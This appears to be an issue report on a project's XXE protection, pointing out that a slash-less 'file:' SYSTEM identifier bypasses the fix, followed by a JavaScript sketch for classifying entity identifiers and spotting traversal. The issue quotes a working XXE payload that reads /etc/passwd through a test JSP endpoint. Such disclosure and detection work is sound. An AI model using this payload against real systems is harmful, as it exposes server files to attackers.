Gap in the XXE fix logic of the new version
k4n5ha0 opened this issue · 1 comments
k4n5ha0 commented
https://www.anquanke.com/post/id/241107
Following the article above, I found that it mentions a payload of this form:
file:../../../../../../../../etc/passwd
The payload is
http://XXXX/vulns/007-xxe-stax.jsp?data=<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:../../../../../etc/passwd" >]><foo>&xxe;</foo>
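
One way to classify an entity's SYSTEM identifier so that the slash-less `file:` form reported above is recognized alongside `file:///...` (an added example, not code from this issue or from the project; `classifySystemId`, `safeDecode` and the sample identifiers are constructed for illustration, and treating a scheme-less identifier as a local file is an assumption of this sketch):

```javascript
// RFC 3986: scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ), followed by ":"
const SCHEME_RE = /^([A-Za-z][A-Za-z0-9+.-]*):/;

function safeDecode(s) {
  // Keep the raw string when it contains malformed %-escapes.
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Hypothetical helper: split a SYSTEM identifier into scheme and path
// without requiring "//" after the scheme.
function classifySystemId(systemId) {
  const id = systemId.trim();
  const m = SCHEME_RE.exec(id);
  let scheme = m ? m[1].toLowerCase() : null;
  let rest = m ? id.slice(m[0].length) : id;
  if (scheme && scheme.length === 1) {
    // "C:\..." is a Windows drive letter, not a URI scheme.
    scheme = null;
    rest = id;
  }
  if (scheme && rest.startsWith('//')) {
    // Strip "//authority" and keep the path that follows it.
    const slash = rest.indexOf('/', 2);
    rest = slash === -1 ? '' : rest.slice(slash);
  }
  const path = safeDecode(rest).replace(/\\/g, '/');
  return {
    scheme,
    path,
    // Assumption: no scheme means a reference resolved against the
    // document base, treated here as a local file.
    localFile: scheme === 'file' || scheme === null,
    traversal: path.split('/').includes('..'),
  };
}

// Constructed sample identifiers; the first is the form quoted in the issue.
const SAMPLES = [
  'file:../../../../../etc/passwd',
  'file:///etc/passwd',
  'http://example.com/a.dtd',
];
for (const s of SAMPLES) console.log(s, JSON.stringify(classifySystemId(s)));
```
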